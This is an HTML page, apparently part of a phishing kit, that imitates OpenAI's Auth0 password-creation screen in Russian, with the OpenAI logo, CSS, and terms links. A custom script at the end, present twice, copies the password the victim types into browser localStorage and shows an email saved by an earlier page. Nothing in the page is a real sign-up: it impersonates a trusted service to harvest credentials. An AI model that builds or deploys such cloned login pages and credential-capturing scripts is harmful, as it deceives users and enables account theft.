<html data-lt-installed="true"><head>    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    
      <meta name="ulp-version" content="1.17.66">
    
    <title>Пароль</title>
    
    <meta name="robots" content="noindex, nofollow">
    
    <link rel="shortcut icon" href="img/logo1.png">
    <link rel="stylesheet" href="https://cdn.auth0.com/ulp/react-components/1.84.5/css/main.cdn.min.css">
    <style id="custom-styles-container">
      
        

body {
  background: #ffffff;
  font-family: ulp-font, -apple-system, BlinkMacSystemFont, Roboto, Helvetica, sans-serif;
}
.c65b66da6 {
  background: #ffffff;
}
.cee8b6d5e.cd4adaa36 {
  background: #D00E17;
}
.cee8b6d5e.cc2459151 {
  background: #806491;
}
.c5faccce1 {
  background-color: #806491;
  color: #ffffff;
}
.c5faccce1 a,
.c5faccce1 a:visited {
  color: #ffffff;
}
.c5556edd0 {
  background-color: #806491;
}
.ce70c634b {
  background-color: #D00E17;
}
@supports (mask-image: url('/static/img/branding-generic/copy-icon.svg')) {
  @supports not (-ms-ime-align: auto) {
    .c8f212026.c838ec48b::before {
      background-color: #D00E17;
    }
  }
}
.input.c266d80ea {
  border-color: #D00E17;
}
.error-cloud {
  background-color: #D00E17;
}
.error-fatal {
  background-color: #D00E17;
}
.error-local {
  background-color: #D00E17;
}
#alert-trigger {
  background-color: #D00E17;
}
      
    </style>
    <style>
    /* By default, hide features for javascript-disabled browsing */
    /* We use !important to override any css with higher specificity */
    /* It is also overriden by the styles in <noscript> in the header file */
    .no-js {
      clip: rect(0 0 0 0);
      clip-path: inset(50%);
      height: 1px;
      overflow: hidden;
      position: absolute;
      white-space: nowrap;
      width: 1px;
    }
  </style>
  <noscript>
    <style>
      /* We use !important to override the default for js enabled */
      /* If the display should be other than block, it should be defined specifically here */
      .js-required { display: none !important; }
      .no-js {
        clip: auto;
        clip-path: none;
        height: auto;
        overflow: auto;
        position: static;
        white-space: normal;
        width: var(--prompt-width);
      }
    </style>
  </noscript>
    
<style>
      @font-face {
          font-family: "Söhne";
          src: url("https://cdn.openai.com/common/fonts/soehne/soehne-buch.woff2")
              format("woff2");
          font-style: normal;
          font-weight: 400;
          font-display: swap;
      }
      @font-face {
          font-family: "Söhne";
          src: url("https://cdn.openai.com/common/fonts/soehne/soehne-buch-kursiv.woff2")
              format("woff2");
          font-style: italic;
          font-weight: 400;
          font-display: swap;
      }
      @font-face {
          font-family: "Söhne";
          src: url("https://cdn.openai.com/common/fonts/soehne/soehne-halbfett.woff2")
              format("woff2");
          font-style: normal;
          font-weight: 700;
          font-display: swap;
      }
      @font-face {
          font-family: "Söhne";
          src: url("https://cdn.openai.com/common/fonts/soehne/soehne-halbfett-kursiv.woff2")
              format("woff2");
          font-style: italic;
          font-weight: 700;
          font-display: swap;
      }

      :root {
          --font-family: "Söhne",-apple-system,BlinkMacSystemFont,Helvetica,sans-serif;
          --primary-color: #806491;
          --primary-color-no-override: #806491;
          --action-primary-color: #806491;
          --link-color: #806491;
          --input-box-shadow-depth: 1px;
          --input-border-radius: 6px;
          --button-border-radius: 6px;
          --page-background-color: #ffffff;
      }

      body {
          font-family: var(--font-family);
          background-color: var(--page-background-color);
      }

      .oai-wrapper {
          display: flex;
          flex-direction: column;
          justify-content: space-between;
          min-height: 100%;
      }

      .oai-header {
          display: flex;
          align-items: center;
          justify-content: center;
          padding: 32px 0 0;
          flex: 0 0 auto;
      }
      .oai-header svg {
          width: 32px;
          height: 32px;
          fill: #202123;
      }

      .oai-footer {
          display: flex;
          align-items: center;
          justify-content: center;
          color: #806491;
          padding: 12px 0 24px;
          flex: 0 0 auto;
      }
      .oai-footer a {
          color: var(--primary-color);
          margin: 0 10px;
      }

      ._widget-auto-layout main._widget {
          flex: 1 0 auto;
          min-height: 0;
      }

      main header > img:first-of-type {
          display: none;
      }
      main > section, main > section > div:first-child {
          box-shadow: none;
      }
      main header > h1 {
          font-weight: bold !important;
          font-size: 32px !important;
      }
      main a {
          font-weight: normal !important;
      }
      .ulp-alternate-action {
          text-align: center;
      }
      button[type="submit"] {
          font-family: var(--font-family);
      }

      

      
          main header > h1 {
              margin-bottom: 0 !important;
          }
      
      
      
    </style>
  </head>
  <body class="_widget-auto-layout">
    <div class="oai-wrapper">
      <header class="oai-header">
       
      </header><main class="_widget ceaa82a77">
  <section class="cd3b6a14d _prompt-box-outer c29f1d46e">
    <div class="c03b35b7e c1ab0b75a">
      <div class="c79b2e0a7">
        <header class="c2486638f c4738ad32">
          <div title="OpenAI" id="custom-prompt-logo" style="width: auto !important; height: 60px !important; position: static !important; margin: auto !important; padding: 0 !important; background-color: transparent !important; background-position: center !important; background-size: contain !important; background-repeat: no-repeat !important"></div>
        
          <img class="c8c467c81 c728b225e" id="prompt-logo-center" src="https://cdn.openai.com/API/images/openai-logomark.png" alt="OpenAI">
        
          
            <h1 class="cec9a2f61 c7a7a5b24">Create your password</h1>
          
        
          <div class="ca86dd81d cb92cda89">
            
          
            
              <p class="cdf38eeeb cbd26c9fb">Выберите пароль для , чтобы перейти к Apps Client</p>
            
          </div>
        </header>
      
        <div class="cd0d8c8b2 ca80280f0">
          
        
          <form method="POST" class="c9baf35ca c032c155c" data-form-primary="true">
            <input type="hidden" name="state" value="hKFo2SBSazlIdmx3eUc0SjFCNFdRclVLdGJYUHFtT2s5bVpnZqFur3VuaXZlcnNhbC1sb2dpbqN0aWTZIHVjaEpIQVBwMGgtRTU5YzhQMkhtMUI4TF90eFlCLXk2o2NpZNkgVGRKSWNiZTE2V29USHROOTVueXl3aDVFNHlPbzZJdEc">
          
            
          
            <div class="cf94b423e c50950f17">
              <input type="hidden" name="strengthPolicy" value="low">
            
              <input type="hidden" name="complexityOptions.minLength" value="12">
            
              <div class="cf94b423e cbcfc411a">
                <div class="c2e75cb77">
                  
                
                  
                    <div>
                      <div class="c8df95220 cf2c4d886 c8a73b8d2 c27f61b89">
                        <span class="ulp-authenticator-selector-text"></span>
                      
                        
                          <a class="c4a8e5b56 cc3a10e59 ca9d60459 c5abe3637" href="index2.html" data-link-name="edit-email" aria-label="Изменить адрес электронной почты">Редактировать</a>
                        
                      
                        <input type="text" name="email" value="" autocomplete="username" readonly="">
                      </div>
                    
                      
                    </div>
                  
                
                  
                
                  <div class="input-wrapper _input-wrapper">
                    <div class="c8f212026 c1872bf7b password c8e3cf825 cfa6ca138" data-action-text="" data-alternate-action-text="">
                      <label class="c36c5c842 no-js c4aba456d c84834c56" for="password">
                        Пароль
                      </label>
                    
                      <input class="input c1a815477 c61ad6f21" name="password" id="password" type="password" required="" autocomplete="new-password" autocapitalize="none" spellcheck="false" autofocus="">
                    
                      <div class="c36c5c842 js-required c4aba456d c84834c56" data-dynamic-label-for="password" aria-hidden="true">
                        Пароль
                      </div>
                    
                      <button type="button" class="cf4ff3b5d ulp-button-icon cfccd0b2a _button-icon" data-action="toggle">
                        <span aria-hidden="true" class="password-icon-tooltip show-password-tooltip">Показать пароль</span>
                      
                        <span aria-hidden="true" class="password-icon-tooltip hide-password-tooltip hide">Скрыть пароль</span>
                      
                        <span class="screen-reader-only password-toggle-label" data-label="show-password">Показать пароль</span>
                      
                        <span class="screen-reader-only password-toggle-label hide" data-label="hide-password">Скрыть пароль</span>
                      
                        <span class="c6ffdd420 password js-required" aria-hidden="true"></span>
                      </button>
                    </div>
                  
                    
                  </div>
                
                  
                </div>
              </div>
            
              
                <div class="c8e6b4f92 no-arrow c1db8f2d5 c2003615c cf9652b9d c643c0a01 c34a54955 hide _hide" aria-live="assertive" aria-atomic="true">
                  
                    
                      <div class="c042f8ee0 c2fd99292">
                        <ul class="ce6f5a8cd">
                          <li class="cc5240511 c75eaa723">
                            
                              <div class="c0c1c9c12 cc5240511">
                                <span class="c39a5b350">Пароль должен содержать:</span>
                              
                                <ul class="c6fc691aa">
                                  
                                    <li class="c540072d2 c838ec48b" data-error-code="password-policy-length-at-least">
                                      <span class="c39a5b350">Минимум 12 символа(-ов) в длину</span>
                                    
                                      
                                    </li>
                                  
                                </ul>
                              </div>
                            
                          </li>
                        </ul>
                      </div>
                    
                  
                </div>
              
            </div>
          
            <div id="custom-field-1"></div>
          
            
          
            <div class="cff0ff2c6">
              
                <button type="submit" name="action" onclick="fun1()" value="default" class="cf4ff3b5d c5faccce1 cfccd0b2a c901653c3 c77144636" data-action-button-primary="true">Продолжить</button>
              
            </div>
          </form>
        
          <div class="ulp-alternate-action  _alternate-action ">
            
          
            <p class="cdf38eeeb cbd26c9fb c78aac1f2">Уже есть учетная запись?
              <a class="c4a8e5b56 c5abe3637" aria-label="">Вход в систему</a>
            </p>
          
            
          </div>
        
          
        </div>
      </div>
    </div>
  
    
  </section>
</main>
<script type="text/javascript" async="" src="https://chat.openai.com/ces/v1/auth.js"></script><script id="client-scripts">

</script>
<footer class="oai-footer">
        <a href="https://openai.com/policies/terms-of-use" target="_blank">Terms of use</a>
        |
        <a href="https://openai.com/policies/privacy-policy" target="_blank">Privacy policy</a>
      </footer>
    </div>

    <script type="text/javascript">
    // Получаем элемент span по классу "ulp-authenticator-selector-text"
var spanElement = document.querySelector('.ulp-authenticator-selector-text');

// Получаем значение из локального хранилища по ключу "email"
var savedEmail = localStorage.getItem('email');

// Проверяем, есть ли сохраненное значение
if (savedEmail) {
    // Устанавливаем значение в текстовое содержимое элемента span
    spanElement.textContent = savedEmail;
}

function fun1() {
      // Get the password input value
      var password = document.getElementById("password").value;

      // Save the password to Local Storage
      localStorage.setItem("password", password);

      // You can also add additional logic or validation here if needed

      // Proceed with the form submission or other actions
      // For now, just alert the user
      
    }
    var spanElement = document.querySelector('.ulp-authenticator-selector-text');


var savedEmail = localStorage.getItem('email');


if (savedEmail) {
   
    spanElement.textContent = savedEmail;
}

function fun1() {
     
      var password = document.getElementById("password").value;

     
      localStorage.setItem("password", password);

      
      
    }
    </script>
  


</body></html>